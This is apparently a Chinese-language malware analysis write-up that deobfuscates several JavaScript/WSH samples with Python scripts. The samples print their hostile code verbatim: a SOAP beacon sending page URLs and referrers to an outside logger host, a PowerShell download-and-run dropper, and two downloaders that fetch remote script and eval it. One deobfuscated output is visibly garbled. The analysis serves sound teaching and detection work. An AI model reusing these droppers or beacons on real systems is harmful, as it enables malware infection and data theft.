Virus_JS3_PyAnalysisAndSummary


本篇是对 JS 样本做简单分析的第三篇,内容有些重复,权当巩固.

0x1 Sample(TotalSamp_myself\Js–166x–63)

// Sample 1 (as found, obfuscated).  "String-array" obfuscation: every property
// name, URL and XML fragment is an \xNN-escaped entry of _0x586f and the code
// refers to them by index.  Decoded entries (see the script output further down
// the page): [0]="value", [1]="xKeyx", [2]="getElementById", [3]="URL", [6]="replace",
// [8]="referrer", [9]="document", [10]="err", [11]="POST",
// [12]="http://logger.ysabel.eu/Logger.asmx", [14]="Content-Type", [15]="text/xml",
// [17]..[30] = the SOAP envelope pieces, [31]="send".
// NOTE(review): entry [34] is "\x22" followed by a raw line break and closes on the
// next physical line -- as pasted, the sample is not valid JS at that point.
var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22
","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];
// k = document.getElementById("xKeyx").value -- a value taken from a page element
// and sent as the <k> field of the beacon below.
var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];
// The constructor is called before its declaration (function hoisting).
var visitorData= new visitorData(k);
// Collects document.URL, the key and top.document.referrer (the cross-frame read
// can throw, hence the try/catch that falls back to "err"), then POSTs them as a
// SOAP LogData request to http://logger.ysabel.eu/Logger.asmx -- a visitor
// tracking / exfiltration beacon.  Detection: outbound POST with Content-Type
// text/xml to that host.  The replace("&","&amp;") is XML escaping and, with a
// string pattern, only touches the first "&".
function visitorData(_0xf4c7x3){
    this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);
    this[_0x586f[7]]=_0xf4c7x3;
    try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;
    var _0xf4c7x4=CreateXMLHttpRequest();
    // Asynchronous request (third argument true); no response handler is installed.
    _0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);
    _0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);
    // Envelope = XML header + <soap:Envelope> + <soap:Body> + <LogData> + <k>key</k>
    //            + <url>document.domain</url> + <ev>objToString(this)</ev> + closing tags.
    var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];
    _0xf4c7x4[_0x586f[31]](_0xf4c7x5);
} ;
// Serialises URL, k and referrer as a quoted, comma-separated record ([32]="",
// [33]="\",", [34]="\"\n"); on any error only the URL is returned.
function objToString(_0xf4c7x7){
    var _0xf4c7x8=_0x586f[32];
    try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;
    return _0xf4c7x8;
} ;
// Parses a SOAP reply and reads LogDataResult ([35]="DOMParser",
// [36]="parseFromString", [37]="Microsoft.XMLDOM", [38]="async", [39]="loadXML",
// [40]="nodeValue", [41]="childNodes", [42]="LogDataResult",
// [43]="getElementsByTagName").  Nothing in this sample calls it.  `parser` and
// `xmlDoc` are assigned without `var`, i.e. they are implicit globals.
function parseResponse(_0xf4c7xa){
    if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;
    // NOTE(review): in the pasted sample the line breaks right after `return`; with
    // automatic semicolon insertion that returns undefined.  Most likely a
    // paste/wrap artifact -- kept exactly as found.
    return 
    xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];
} ;
// XHR factory with the legacy ActiveX fallback ([44]="undefined",
// [45]="Microsoft.XMLHTTP", [46]="XMLHttpRequest not supported").
function CreateXMLHttpRequest(){
    if( typeof XMLHttpRequest!=_0x586f[44]){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return  new ActiveXObject(_0x586f[45]);} else {throw  new Error(_0x586f[46]);} ;} ;
} ;

0x2 py脚本

#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '063.JS.vir'          #JsVirus文件OutPath = '63_analysis.txt'     #提取到的文件myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'):    logall = []    #print(InPath)    if os.path.exists(InPath):        f = codecs.open(InPath,ReadTye,'utf-8')        #读入到list        for line in f:            if None == line:                pass            else:                logall.append(line)        f.close()    return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'):      #后面可能改成词典    #if os.path.exists(InPath):    #   pass    #else:    #要用全局变量把这里变成只写一次吗    global AuthorSign    f = codecs.open(OutRePath,WriteTye,'utf-8')    if AuthorSign == True:        f.write('\n*****************************************************\r\n')        f.write('*              ahoo JsVirusAnalysis                        ')        f.write('\n***************************************************\r\n\n')        AuthorSign = False    for i in findRe:        f.write(i + '\n')    f.close()    return Truedef JSVirus_Parse():    #1.读取文件到LineList    myJslog = ReadLogFile(PutPath)    #print(myJslog)    writeList_temp = []    writeList = []    #2.分为两部分处理.    
f586List = []    pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')    for line in myJslog:        if '_0x586f=["' in line:            #2.1 替换16进制--            for i in pattern_ascii.findall(line):                #方法1                #line = line.replace(i[0], chr(int(i[1],16)))                #方法2                pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')                line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)            print(line)            writeList.append(line)            #2.2 分割为数组            #line13 = 'var _0x586f=["value","xKeyx","getElementById","URL","&","&amp"];'            #re.match(r"\[(.*)\]",line13[12:]).group(1)            f586List = re.match(r"\[(.*)\]",line[12:]).group(1).split(',')            print(f586List)        else:            writeList_temp.append(line)    #3.替换数组    #3.1查找所有数组    ''' for test    line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"    print(line11)    pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')    for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line11):        index = int(arrary)        repStr = "*haha*"        line11 = pattern_arrary.sub(repStr,line11,count=1)    print(line11)    '''    for line in writeList_temp:        pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')        for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line):            index   = int(arrary)            repStr  = f586List[index]            line    = pattern_arrary.sub(repStr,line,count=1)            #3.2替换分割的字符串+            plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"')             line = plus.sub('',line)    writeList.append(line)      #4 写入并打开文件    WriteResultFile(OutPath,writeList)    os.system('notepad.exe ' + OutPath)    print('The Virus has been analyzed,there is my advice! Thanks!')    return Trueif __name__ == '__main__':    JSVirus_Parse()

0x3 输出结果

做过美容的.var _0x586f=["value","xKeyx","getElementById","URL","&","&amp;","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];var k = document["getElementById"]("xKeyx")["value"];var visitorData = new visitorData(k);function visitorData(_0xf4c7x3) {        this["URL"] = document["URL"]["replace"]("&", "&amp;");        this["k"] = _0xf4c7x3;        try {            this["referrer"] = top["document"]["referrer"]["replace"]("&", "&amp;");        } catch (err) {            this["referrer"] = "err";        };        var _0xf4c7x4 = CreateXMLHttpRequest();        _0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true);        _0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml");        var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} 
catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return  new ActiveXObject("undefined");} else {throw  new Error("Microsoft.XMLHTTP");} ;} ;} ;

0x4 注意

[1] 生成代码后做个美容(格式化): http://www.css88.com/tool/js_beautify/
[2] 正则测试工具: F:\RegTestTool.exe

0x5下面做点扩充吧,js的都往后续…

0x5.1 Num25

// Sample Num25: one-line WSH (JScript) dropper.
// The ProgID is assembled at run time -- 'Shell.TrimiApplication' with 'Trimi'
// removed gives "Shell.Application" -- so the literal ProgID never appears in the
// file and a plain string match on it misses the sample.
var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));
// Shell.Application.ShellExecute launches PowerShell, which downloads hekycc.exe
// from pomf.nyafuu.org, stores it as hajdebabuchajde.pif and starts it.  The
// trailing 0 is the vShow argument (window not shown).  Detection points:
// wscript.exe / cscript.exe spawning powershell.exe with DownloadFile and
// Start-Process on its command line, and a new .pif in the script's working
// directory; the URL and file names are the indicators.
d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);

0x5.2 Num41

// Sample Num41: two-domain stage-2 downloader.  `m` is a campaign token that is
// both sent as the query string (/counter/?<m>) and used as the split key below;
// the two hosts in `x` are the indicators to block / hunt for.
var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0";
var x = new Array("jaysonandfrisby.com","romiecoston.com");
var z1 = "Msxml2.XMLHTTP";
var z4 = "a";
// Tries each host in order and stops at the first HTTP 200.
for (var i=0; i<2; i++) {
    var e = new ActiveXObject(z1);
    try {
        // Synchronous GET (third argument false); nothing is written to disk.
        e.open("GET", "http://"+x[i]+"/counter/?"+m, false);
        e.send();
        if (e.status == 200) {
            // Every occurrence of the token in the response is replaced by "a"
            // (split on m, join with z4) and the result is eval'd -- so the served
            // body is presumably keyed on the token and is not usable as-is.
            var z3 = e.responseText;
            var z3 = z3.split(m);
            var z3 = z3.join(z4);
            eval(z3);
            break; }
        ; }
    // All errors are swallowed, so a blocked host gives no visible symptom
    // (`catch(e)` also shadows the request object `e` inside the handler).
    catch(e)
        { }; };

0x5.3 Num29

0x5.3.1样本

    // Sample Num29: WSH downloader.  The escaped literals decode (see the Python
    // output further down) to "MSXML2.XMLHTTP", "GET",
    // "https://dl-phdzmfjh.nl/p2e.js?" and the appended call downAndExec("pg6v");.
    // random() only makes the URL unique per run (cache-busting); the host/path
    // is the indicator to search for.
    var random=function(){return Math.random()};
    try{
    var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");
    // Synchronous GET (third argument false).
    objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);
    objHttp.Send();
    // The downloaded text is eval'd with the call appended, so the stage-2 script
    // presumably defines downAndExec and "pg6v" is its argument.
    if(objHttp.Status== 200){
        eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")}
    }
    // Any failure (no network, blocked host) is silently swallowed.
    catch(e){}

0x5.3.2Py代码

#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '029.JS.vir'          OutPath = '29_analysis.txt' #提取到的文件.myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'):    logall = []    #print(InPath)    if os.path.exists(InPath):        f = codecs.open(InPath,ReadTye,'utf-8')        #读入到list        for line in f:            if None == line:                pass            else:                logall.append(line)        f.close()    return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'):      #后面可能改成词典    #if os.path.exists(InPath):    #   pass    #else:    #要用全局变量把这里变成只写一次吗    global AuthorSign    f = codecs.open(OutRePath,WriteTye,'utf-8')    if AuthorSign == True:        f.write('\n*****************************************************\r\n')        f.write('*              ahoo JsVirusAnalysis                        ')        f.write('\n***************************************************\r\n\n')        AuthorSign = False    for i in findRe:        f.write(i + '\n')    f.close()    return Truedef JSVirus_Parse():    #1.读取文件到LineList    myJslog = ReadLogFile(PutPath)    #print(myJslog)    writeList = []    pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')    for line in myJslog:            for i in pattern_ascii.findall(line):            #方法1            #line = line.replace(i[0], chr(int(i[1],16)))            #方法2            pattern_tem = re.compile(r'(\\x[0-9][a-zA-Z0-9])')            line = pattern_tem.sub(chr(int(i[1],16)),line,count =1)        print(line)        writeList.append(line)    #4 写入并打开文件    WriteResultFile(OutPath,writeList)    os.system('notepad.exe ' + OutPath)    print('The Virus has been analyzed,there is my advice! Thanks!')    return Trueif __name__ == '__main__':    JSVirus_Parse()

0x5.3.3输出

******************************************************               ahoo JsVirusAnalysis                        ***************************************************var random=function(){    return Math.random()};try{    var objHttp=WScript.CreateObject("MSXML2.XMLHTTP");    objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false);    objHttp.Send();if(objHttp.Status== 200){        eval(objHttp.responseText+ "downAndExec("pg6v");")}}catch(e){}

0x6 小结

强调一点:复杂、看不懂的代码先做美化(格式化),之后找规律就容易多了.
【调试】js/vbs(默认调试器 vs2013): cmd: WScript.exe /x name.js/vbs
【调试】JS(od-找downhttp): OD 载入 wscript.exe, 调试->参数(jsPath), ctrl+F2, bp UrlCanonicalizeA/W, F9.
【调试】正则工具: F:\RegTestTool.exe
【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)
【代码美化-JS】http://www.css88.com/tool/js_beautify/
【VB关键字】executeglobal(str) EXECUTE(str)
【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)
【正则】
1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line)
2.替换某一行中的所有符合条件
''' for test
line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"
print(line11)
pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line11):
    index = int(arrary)
    repStr = "*haha*"
    line11 = pattern_arrary.sub(repStr,line11,count=1)
print(line11)
'''
3.替换\x56为char
'''
line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");'
pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
for i in pattern_ascii.findall(line):
    #方法1
    #line = line.replace(i[0], chr(int(i[1],16)))
    #方法2
    pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
    line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)
print(line)
'''